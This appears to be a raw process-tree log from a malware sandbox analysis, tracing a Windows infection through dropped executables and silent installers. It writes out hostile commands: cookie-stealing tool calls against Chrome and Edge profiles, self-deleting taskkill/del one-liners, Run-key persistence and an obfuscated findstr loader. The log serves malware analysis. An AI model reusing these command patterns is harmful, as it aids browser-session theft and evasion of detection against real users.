C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵
- Drops file in Program Files directory
PID:7120
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:1716
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsb1F6D.tmp\tempfile.ps1"7⤵PID:2228
-
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT7⤵PID:6180
-
-
-
C:\Users\Admin\Documents\tG6iObmAGaX11buSI23Q6usP.exe"C:\Users\Admin\Documents\tG6iObmAGaX11buSI23Q6usP.exe"6⤵
- Executes dropped EXE
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
PID:4608
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵
- Executes dropped EXE
PID:5040
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5728
-
-
-
C:\Users\Admin\Documents\mBIlmAn3SwRW5L9XM4_Hisb2.exe"C:\Users\Admin\Documents\mBIlmAn3SwRW5L9XM4_Hisb2.exe"6⤵
- Executes dropped EXE
PID:5064 -
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"7⤵PID:2396
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:5376
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"8⤵PID:5412
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:5940
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"8⤵
- Executes dropped EXE
PID:5996
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:4108
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"8⤵
- Executes dropped EXE
PID:4908
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:5412
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"8⤵PID:5468
-
-
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:4132
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"7⤵
- Executes dropped EXE
PID:3512 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:4008
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵
- Executes dropped EXE
PID:5836
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:4328
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt8⤵PID:5720
-
-
-
-
C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe"C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:580 -
C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe"{path}"7⤵PID:4328
-
-
C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe"{path}"7⤵
- Loads dropped DLL
- Checks processor information in registry
PID:6004 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im c7ITdNhhcio8ABAfjezodNVE.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\c7ITdNhhcio8ABAfjezodNVE.exe" & del C:\ProgramData\*.dll & exit8⤵PID:4184
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im c7ITdNhhcio8ABAfjezodNVE.exe /f9⤵
- Kills process with taskkill
PID:6120
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 69⤵
- Delays execution with timeout.exe
PID:3716
-
-
-
-
-
C:\Users\Admin\Documents\Z0mpIdw250ioIlFq9G4jxj2t.exe"C:\Users\Admin\Documents\Z0mpIdw250ioIlFq9G4jxj2t.exe"6⤵
- Executes dropped EXE
PID:4384 -
C:\Users\Admin\Documents\Z0mpIdw250ioIlFq9G4jxj2t.exe"C:\Users\Admin\Documents\Z0mpIdw250ioIlFq9G4jxj2t.exe"7⤵
- Executes dropped EXE
- Drops startup file
- Modifies data under HKEY_USERS
PID:2396
-
-
-
C:\Users\Admin\Documents\AIk1de2B5c8JTfTJCb9GhHAo.exe"C:\Users\Admin\Documents\AIk1de2B5c8JTfTJCb9GhHAo.exe"6⤵
- Executes dropped EXE
PID:2136 -
C:\Users\Admin\AppData\Local\Temp\is-3081U.tmp\AIk1de2B5c8JTfTJCb9GhHAo.tmp"C:\Users\Admin\AppData\Local\Temp\is-3081U.tmp\AIk1de2B5c8JTfTJCb9GhHAo.tmp" /SL5="$3020A,138429,56832,C:\Users\Admin\Documents\AIk1de2B5c8JTfTJCb9GhHAo.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1484 -
C:\Users\Admin\AppData\Local\Temp\is-4BUQI.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-4BUQI.tmp\Setup.exe" /Verysilent8⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:5212 -
C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe"9⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:5496 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im GameBox64bit.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\GameBox INC\GameBox\GameBox64bit.exe" & del C:\ProgramData\*.dll & exit10⤵PID:5888
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im GameBox64bit.exe /f11⤵
- Kills process with taskkill
PID:5476
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 611⤵
- Delays execution with timeout.exe
PID:5056
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox32Bit.exe"9⤵
- Executes dropped EXE
PID:5516 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:5288
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt10⤵PID:4872
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"9⤵
- Executes dropped EXE
PID:5532 -
C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe"C:\Program Files (x86)\GameBox INC\GameBox\BotCheck.exe" -a10⤵
- Executes dropped EXE
PID:5420
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBox.exe"9⤵
- Executes dropped EXE
PID:5564 -
C:\Users\Admin\AppData\Roaming\2845038.exe"C:\Users\Admin\AppData\Roaming\2845038.exe"10⤵
- Executes dropped EXE
PID:5984
-
-
C:\Users\Admin\AppData\Roaming\8227740.exe"C:\Users\Admin\AppData\Roaming\8227740.exe"10⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5932 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"11⤵PID:5364
-
-
-
C:\Users\Admin\AppData\Roaming\2653054.exe"C:\Users\Admin\AppData\Roaming\2653054.exe"10⤵
- Executes dropped EXE
PID:6028
-
-
C:\Users\Admin\AppData\Roaming\5942205.exe"C:\Users\Admin\AppData\Roaming\5942205.exe"10⤵
- Executes dropped EXE
PID:6080 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6080 -s 202411⤵
- Program crash
PID:4876
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"9⤵
- Executes dropped EXE
PID:5632 -
C:\Users\Admin\AppData\Local\Temp\is-GT0OR.tmp\GameBoxWin32.tmp"C:\Users\Admin\AppData\Local\Temp\is-GT0OR.tmp\GameBoxWin32.tmp" /SL5="$40260,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin32.exe"10⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5744 -
C:\Users\Admin\AppData\Local\Temp\is-CKMO3.tmp\Daldoula.exe"C:\Users\Admin\AppData\Local\Temp\is-CKMO3.tmp\Daldoula.exe" /S /UID=burnerch211⤵
- Drops file in Drivers directory
- Adds Run key to start application
PID:5472 -
C:\Program Files\7-Zip\DOFUJICBYJ\ultramediaburner.exe"C:\Program Files\7-Zip\DOFUJICBYJ\ultramediaburner.exe" /VERYSILENT12⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\is-30VP5.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-30VP5.tmp\ultramediaburner.tmp" /SL5="$40240,281924,62464,C:\Program Files\7-Zip\DOFUJICBYJ\ultramediaburner.exe" /VERYSILENT13⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:4164 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu14⤵PID:5444
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\4a-85f8f-6ce-0a4be-aaa1309760dfa\Gagorehepi.exe"C:\Users\Admin\AppData\Local\Temp\4a-85f8f-6ce-0a4be-aaa1309760dfa\Gagorehepi.exe"12⤵
- Checks computer location settings
PID:6104 -
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\dw20.exedw20.exe -x -s 133613⤵PID:5060
-
-
-
C:\Users\Admin\AppData\Local\Temp\2e-93f38-151-6f9a2-671493dcb99f9\Muxunyweby.exe"C:\Users\Admin\AppData\Local\Temp\2e-93f38-151-6f9a2-671493dcb99f9\Muxunyweby.exe"12⤵PID:5896
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4vbn3t40.11x\GcleanerEU.exe /eufive & exit13⤵PID:4840
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\installer.exe /qn CAMPAIGN="654" & exit13⤵PID:5328
-
C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\installer.exeC:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\installer.exe /qn CAMPAIGN="654"14⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:5100 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\hpr5e55t.tl3\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1627977786 /qn CAMPAIGN=""654"" " CAMPAIGN="654"15⤵PID:7092
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s3yyqkpo.5zz\ufgaa.exe & exit13⤵PID:5388
-
C:\Users\Admin\AppData\Local\Temp\s3yyqkpo.5zz\ufgaa.exeC:\Users\Admin\AppData\Local\Temp\s3yyqkpo.5zz\ufgaa.exe14⤵
- Suspicious use of SetThreadContext
PID:4400 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt15⤵PID:6464
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt15⤵PID:6764
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt15⤵PID:6948
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt15⤵PID:6872
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe & exit13⤵PID:5604
-
C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exeC:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe14⤵PID:5964
-
C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe"C:\Users\Admin\AppData\Local\Temp\sk3pj43x.4n4\anyname.exe" -q15⤵PID:6152
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4rosevni.u1q\askinstall52.exe & exit13⤵PID:6160
-
C:\Users\Admin\AppData\Local\Temp\4rosevni.u1q\askinstall52.exeC:\Users\Admin\AppData\Local\Temp\4rosevni.u1q\askinstall52.exe14⤵PID:6328
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe15⤵PID:2228
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe16⤵
- Kills process with taskkill
PID:5200
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe & exit13⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exeC:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe14⤵PID:6600
-
C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe"C:\Users\Admin\AppData\Local\Temp\disfku1c.tzw\5674d7511aa1fce0a68969dc57375b63.exe"15⤵
- Modifies data under HKEY_USERS
PID:7080
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\lxtpz2hh.3gv\gcleaner.exe /mixfive & exit13⤵PID:6540
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gfna2qed.xwf\installer.exe /qn CAMPAIGN=654 & exit13⤵PID:6636
-
C:\Users\Admin\AppData\Local\Temp\gfna2qed.xwf\installer.exeC:\Users\Admin\AppData\Local\Temp\gfna2qed.xwf\installer.exe /qn CAMPAIGN=65414⤵PID:6780
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe /8-2222 & exit13⤵PID:6704
-
C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exeC:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe /8-222214⤵PID:6824
-
C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe"C:\Users\Admin\AppData\Local\Temp\ntljmfjb.nb4\app.exe" /8-222215⤵
- Modifies data under HKEY_USERS
PID:7060
-
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"C:\Program Files (x86)\GameBox INC\GameBox\note8876.exe"9⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5600
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_6.exe4⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_6.exesonia_6.exe5⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1608 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:2504
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵
- Executes dropped EXE
PID:4700
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:6708
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt6⤵PID:5852
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_7.exe4⤵PID:2292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_4.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2296 -
C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_4.exesonia_4.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2248
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1492 -s 5284⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sonia_3.exe4⤵
- Suspicious use of WriteProcessMemory
PID:2976
-
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s SENS1⤵PID:1408
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Themes1⤵PID:1244
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s UserManager1⤵PID:1188
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s ProfSvc1⤵PID:1056
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s Schedule1⤵
- Drops file in System32 directory
PID:912 -
C:\Users\Admin\AppData\Roaming\wgcfjssC:\Users\Admin\AppData\Roaming\wgcfjss2⤵
- Suspicious use of SetThreadContext
PID:4528 -
C:\Users\Admin\AppData\Roaming\wgcfjssC:\Users\Admin\AppData\Roaming\wgcfjss3⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:7136
-
-
-
C:\Users\Admin\AppData\Roaming\iccfjssC:\Users\Admin\AppData\Roaming\iccfjss2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:6248
-
-
C:\Users\Admin\AppData\Roaming\wgcfjssC:\Users\Admin\AppData\Roaming\wgcfjss2⤵
- Suspicious use of SetThreadContext
PID:4412 -
C:\Users\Admin\AppData\Roaming\wgcfjssC:\Users\Admin\AppData\Roaming\wgcfjss3⤵
- Checks SCSI registry key(s)
PID:6460
-
-
-
C:\Users\Admin\AppData\Roaming\iccfjssC:\Users\Admin\AppData\Roaming\iccfjss2⤵
- Checks SCSI registry key(s)
PID:1804
-
-
C:\Users\Admin\AppData\Roaming\wgcfjssC:\Users\Admin\AppData\Roaming\wgcfjss2⤵
- Suspicious use of SetThreadContext
PID:5476 -
C:\Users\Admin\AppData\Roaming\wgcfjssC:\Users\Admin\AppData\Roaming\wgcfjss3⤵PID:2908
-
-
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s gpsvc1⤵PID:340
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Checks processor information in registry
- Modifies registry class
PID:2384
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
PID:4736
-
-
C:\Users\Admin\AppData\Local\Temp\7zS8D9BC4B4\sonia_3.exesonia_3.exe1⤵
- Executes dropped EXE
- Modifies system certificate store
PID:3920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 14282⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4620
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:3780 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2416
-
-
C:\Users\Admin\AppData\Local\Temp\AB7E.exeC:\Users\Admin\AppData\Local\Temp\AB7E.exe1⤵
- Executes dropped EXE
PID:5228 -
C:\Windows\SysWOW64\dllhost.exe"C:\Windows\System32\dllhost.exe"2⤵PID:5624
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Perisce.jar2⤵PID:5760
-
C:\Windows\SysWOW64\cmd.execmd3⤵PID:2600
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^RjxbYtQhXRvMStXsrWjZzMEutIshVobYBYKPlbziZPusCiQZrGYjUBLtHgafMCaOxblTxouFDtZDGjDXRslgl$" Presto.jar4⤵PID:5624
-
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.comPreme.exe.com r4⤵PID:5772
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r5⤵PID:2416
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r6⤵PID:5700
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r7⤵PID:6116
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r8⤵PID:6076
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Preme.exe.com r9⤵
- Drops startup file
- Suspicious use of SetThreadContext
PID:668 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe10⤵PID:6420
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 304⤵
- Runs ping.exe
PID:208
-
-
-
-
C:\Windows\system32\rUNdlL32.eXerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main1⤵
- Process spawned unexpected child process
PID:5268 -
C:\Windows\SysWOW64\rundll32.exerUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main2⤵
- Loads dropped DLL
PID:5692
-
-
C:\Users\Admin\AppData\Local\Temp\BB8D.exeC:\Users\Admin\AppData\Local\Temp\BB8D.exe1⤵
- Suspicious use of SetWindowsHookEx
PID:5164
-
C:\Users\Admin\AppData\Local\Temp\1E9D.exeC:\Users\Admin\AppData\Local\Temp\1E9D.exe1⤵PID:5396
-
C:\Users\Admin\AppData\Roaming\qVvquLokHABE.exe"C:\Users\Admin\AppData\Roaming\qVvquLokHABE.exe"2⤵PID:5192
-
-
C:\Users\Admin\AppData\Local\Temp\22A5.exeC:\Users\Admin\AppData\Local\Temp\22A5.exe1⤵
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops desktop.ini file(s)
- Suspicious use of SetWindowsHookEx
- System policy modification
PID:5020
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s seclogon1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5404
-
C:\Users\Admin\AppData\Local\Temp\31E8.exeC:\Users\Admin\AppData\Local\Temp\31E8.exe1⤵
- Loads dropped DLL
PID:492 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\31E8.exe"2⤵PID:4968
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:696
-
-
-
